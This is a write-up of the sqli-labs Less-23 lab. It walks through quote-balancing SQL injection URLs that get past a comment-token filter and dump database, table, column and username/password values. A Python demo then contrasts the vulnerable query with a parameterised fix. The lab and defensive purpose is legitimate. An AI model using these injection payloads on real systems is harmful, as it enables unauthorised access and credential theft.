This level:
The SQL statement is
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
The main point here is that the # and -- comment characters are filtered out when the id parameter is read.
Injection:
0x01:
http://192.168.83.129/sqli-labs-master/Less-23/?id=1' order by 3 --+
The page output shows that --+ did not comment out the part after LIMIT; it was evidently filtered out. Based on the SQL statement above, we construct a correctly formed statement instead.
0x02
Determine the number of columns:
http://192.168.83.129/sqli-labs-master/Less-23/?id=1' order by 4,'3
http://192.168.83.129/sqli-labs-master/Less-23/?id=1' order by 3,'3
http://192.168.83.129/sqli-labs-master/Less-23/?id=-1' union select 1,2,database(),3' We can see that there is plenty of data.
Dump the databases:
http://192.168.83.129/sqli-labs-master/Less-23/?id=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),%273
Dump the tables:
http://192.168.83.129/sqli-labs-master/Less-23/?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema="security"),%273
Dump the columns:
http://192.168.83.129/sqli-labs-master/Less-23/?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name="users"),%273
Dump the field values:
http://192.168.83.129/sqli-labs-master/Less-23/?id=-1' union select 1,(select group_concat(username,password) from security.users),%273
http://192.168.83.129/sqli-labs-master/Less-23/?id=-1' union select 1,(select group_concat(username) from security.users),%273
http://192.168.83.129/sqli-labs-master/Less-23/?id=-1' union select 1,(select group_concat(password) from security.users),%273
This completes the injection.
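The lesson of this level for the defender is that deleting comment tokens is not a fix: the statement is still built by string concatenation, and a value that balances the surrounding quotes needs no comment at all. The following Python/SQLite model is an added example, not code from the original post or from the sqli-labs project. It reproduces the level's query with the #/-- blacklist, runs the two request shapes used above against it, and places a parameterised query with an integer allowlist on id beside it. The table rows, the 'x' literal (standing in for database(), which SQLite lacks) and all function names are constructed for the demo.

```python
import re
import sqlite3


# Constructed stand-in for the lab's security.users table; the rows are made up for this demo.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "pw-1"), (2, "bob", "pw-2"), (3, "carol", "pw-3")],
    )
    return conn


def strip_comments(value):
    # The Less-23 style blacklist: delete the '#' and '--' comment tokens from the id parameter.
    return re.sub(r"#|--", "", value)


def vulnerable_query(conn, user_id):
    # Comment filter followed by string concatenation, mirroring the level's SQL statement.
    sql = "SELECT * FROM users WHERE id='" + strip_comments(user_id) + "' LIMIT 0,1"
    return conn.execute(sql).fetchall()


def validate_id(user_id):
    # Allowlist: id must be a decimal integer, otherwise it is rejected (None).
    return int(user_id) if re.fullmatch(r"\d+", user_id) else None


def safe_query(conn, user_id):
    # Validation plus a parameterised statement: the bound value can never alter query structure.
    checked = validate_id(user_id)
    if checked is None:
        return []
    return conn.execute("SELECT * FROM users WHERE id=? LIMIT 0,1", (checked,)).fetchall()


def outcome(func, conn, user_id):
    # Summarise one request the way a tester sees it: a database error, or the rows returned.
    try:
        return func(conn, user_id)
    except sqlite3.Error as exc:
        return "error: " + type(exc).__name__


def demo():
    conn = make_db()
    # Request values shaped like those in the writeup; the '+' of --+ is URL encoding of a space.
    comment_payload = "1' order by 3 --"
    # The quote-balancing shape; 'x' stands in for database(), which SQLite does not provide.
    balanced_payload = "-1' union select 1,'x','3"
    return {
        # The filter removes '--', leaving an unterminated quote: the request fails with an error.
        "vuln_comment": outcome(vulnerable_query, conn, comment_payload),
        # No comment token to remove: the injected row comes back from the concatenated query.
        "vuln_balanced": outcome(vulnerable_query, conn, balanced_payload),
        # Same value against the parameterised, validated query: nothing is returned.
        "safe_balanced": outcome(safe_query, conn, balanced_payload),
        # Legitimate input still works through the safe path.
        "safe_normal": outcome(safe_query, conn, "1"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name:14s} {result}")
```

Running the module prints the four outcomes side by side; the blacklist only turns the comment-based request into an error, while the parameterised version returns an empty result for the balanced-quote value and the normal row for id=1.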